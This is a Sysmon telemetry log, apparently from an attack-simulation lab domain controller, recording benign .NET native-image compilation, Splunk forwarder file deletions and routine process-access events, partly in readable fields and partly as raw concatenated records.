EventRecordID 19206  Event 23 FileDelete  UtcTime 21:01:46.947
  ProcessGuid {4DB9351A-A13A-60D3-B502-00000000CF01}  ProcessId 6592  User NT AUTHORITY\SYSTEM
  Image C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  TargetFilename C:\Windows\assembly\temp\EN8D4AZ5KR\System.Web.Extensions.Design.ni.dll
  Hashes MD5=562C4CB533828D09FD3D8B6C43166FD2,SHA256=EFEF7FD1E49CD41432D7677D7286BB9AE05409BED1573C38A840E414028F4849  IsExecutable true  Archived true

EventRecordID 19205  Event 11 FileCreate (RuleName DLL)  UtcTime 21:01:46.915
  ProcessGuid {4DB9351A-A13A-60D3-B502-00000000CF01}  ProcessId 6592
  Image C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  TargetFilename C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\19c0-0\System.Web.Extensions.Design.dll
  CreationUtcTime 2021-06-23 21:01:46.915

EventRecordID 19204  Event 23 FileDelete  UtcTime 21:01:46.556
  ProcessGuid {4DB9351A-9DFF-60D3-7600-00000000CF01}  ProcessId 3068  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security
  Hashes MD5=19130A299F05F60DD5B5E85E2D32EF09,SHA256=2C14829155FA473511EA3E52D1B895134345FA609EBCC7F6EDAD7A3DB013EB6A  IsExecutable false  Archived true

EventRecordID 19203  Event 10 ProcessAccess  UtcTime 21:01:46.368
  Source {4DB9351A-9DDD-60D3-0C00-00000000CF01}  ProcessId 844  ThreadId 368  C:\Windows\system32\svchost.exe
  Target {4DB9351A-A13A-60D3-B502-00000000CF01}  ProcessId 6592  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1000  CallTrace CT-A

EventRecordID 19202  Event 10 ProcessAccess  UtcTime 21:01:46.353
  Source {4DB9351A-9DDB-60D3-0500-00000000CF01}  ProcessId 412  ThreadId 496  C:\Windows\system32\csrss.exe
  Target {4DB9351A-A13A-60D3-B502-00000000CF01}  ProcessId 6592  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1fffff  CallTrace CT-B

EventRecordID 19201  Event 10 ProcessAccess  UtcTime 21:01:46.353
  Source {4DB9351A-A036-60D3-1601-00000000CF01}  ProcessId 680  ThreadId 5292  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
  Target {4DB9351A-A13A-60D3-B502-00000000CF01}  ProcessId 6592  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x103801  CallTrace CT-C

EventRecordID 19200  Event 10 ProcessAccess  UtcTime 21:01:46.228
  Source {4DB9351A-9DDD-60D3-0C00-00000000CF01}  ProcessId 844  ThreadId 368  C:\Windows\system32\svchost.exe
  Target {4DB9351A-A13A-60D3-B402-00000000CF01}  ProcessId 5328  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  GrantedAccess 0x1000  CallTrace CT-A
10341000x800000000000000019199Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:46.212{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A13A-60D3-B402-00000000CF01}5328C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019198Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:46.212{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13A-60D3-B402-00000000CF01}5328C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019197Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:46.088{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13A-60D3-B302-00000000CF01}5748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019196Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:46.056{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A13A-60D3-B302-00000000CF01}5748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019195Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:46.056{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13A-60D3-B302-00000000CF01}5748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019194Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.993{4DB9351A-A139-60D3-B202-00000000CF01}4152NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\X08IQRKSBG\System.Web.Entity.Design.ni.dll.auxMD5=0579001CA4D2CFCBB305EEB80FCC2F46,SHA256=49133F4237934A873AFFF09ECAD48B6C366D418508EE83420E1897C7703C90A0,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000019193Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:45.993{4DB9351A-A139-60D3-B202-00000000CF01}4152NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\X08IQRKSBG\System.Web.Entity.Design.ni.dllMD5=8CE96DBC36476037D0ECA751F5CC8E77,SHA256=214D9DEE07FBD80A83B3903E57B0CAFE751B397B3EB9AD2321E36634633E28CA,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000019215Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:47.243{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13B-60D3-B702-00000000CF01}5332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019214Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:47.228{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A13B-60D3-B702-00000000CF01}5332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019213Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:47.228{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13B-60D3-B702-00000000CF01}5332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019212Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:47.040{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13B-60D3-B602-00000000CF01}6484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000019211Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:47.025{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A13B-60D3-B602-00000000CF01}6484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019210Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:47.025{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13B-60D3-B602-00000000CF01}6484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019218Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:48.993{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3414AE5086D6446D59DBDDFE3FCD075F,SHA256=E72793776B89A96EFBD50020BD07B87F33347D914765243438B873EF2E8548CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019217Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:48.025{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=604AC0A4F1B2AC6E3491DEB81405689A,SHA256=36CAB552AAF7F8ADF3EF34FE3A13720EBA57366EBE5C6729AAAD92912F0056DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019216Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:47.993{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=146CF8B5EF679AA7B3A16920D0EC89F1,SHA256=DF89DB19384212C4560D9AF96ADDFDCE41571306F10E6FD899DDF339CDA9DB05,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019233Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:49.978{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13D-60D3-BA02-00000000CF01}6584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019232Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.962{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A13D-60D3-BA02-00000000CF01}6584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019231Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:49.962{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13D-60D3-BA02-00000000CF01}6584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019230Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.915{4DB9351A-A13D-60D3-B902-00000000CF01}2580NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MUMQKUGBZ0\System.Web.RegularExpressions.ni.dll.auxMD5=6D25FFF148E58B1C53D70FC69B5EFC03,SHA256=D092EE4968BB6655A4510984C3519BA20A5569576971D3E089EA7C5A4BB55038,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000019229Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.915{4DB9351A-A13D-60D3-B902-00000000CF01}2580NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MUMQKUGBZ0\System.Web.RegularExpressions.ni.dllMD5=D6A39AF2473D520CC5245039E8BE0D4F,SHA256=39175B67801F1BF908C7A17F59DA9283F7EE011A5C9D516C977AEAA9F7AF133C,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019228Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:49.884{4DB9351A-A13D-60D3-B902-00000000CF01}2580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\a14-0\System.Web.RegularExpressions.dll2021-06-23 21:01:49.884 10341000x800000000000000019227Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.618{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13D-60D3-B902-00000000CF01}2580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019226Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:49.603{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A13D-60D3-B902-00000000CF01}2580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019225Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:49.603{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A13D-60D3-B902-00000000CF01}2580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019224Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:49.493{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A13D-60D3-B802-00000000CF01}6936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019223Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 